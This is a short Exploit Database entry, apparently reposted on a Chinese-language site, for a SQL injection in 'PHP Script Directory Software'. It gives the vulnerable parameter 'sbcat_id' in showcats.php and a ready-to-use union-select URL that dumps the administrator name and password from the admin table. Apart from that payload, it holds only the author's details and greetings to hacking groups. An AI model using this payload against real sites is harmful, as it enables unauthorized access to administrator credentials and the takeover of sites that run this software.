PHP Script Directory Software – ‘sbcat_id’ SQL Injection

• Exploit Database
• 11 阅读

• 作者： h4ck3r
  日期： 2011-01-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16069/

• ==
  Author: BorN To K!LL - h4ck3r
  Contact: SQL@hotmail.co.uk
  ==
  Script: PHP script directory software
  Version: n/a
  Link: http://www.softbizsolutions.com/script-directory-software.php
  ==
  3xploit:
  [path]/showcats.php?sbcat_id=[SQL-Injection]
  
  3xample:
  [path]/showcats.php?sbcat_id=-9999+union+all+select+1,concat(sbadmin_name,0x3a,sbadmin_pwd),3,4,5+from+sbrrs_admin--
  
  ==
  Greetings:
  darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
  ==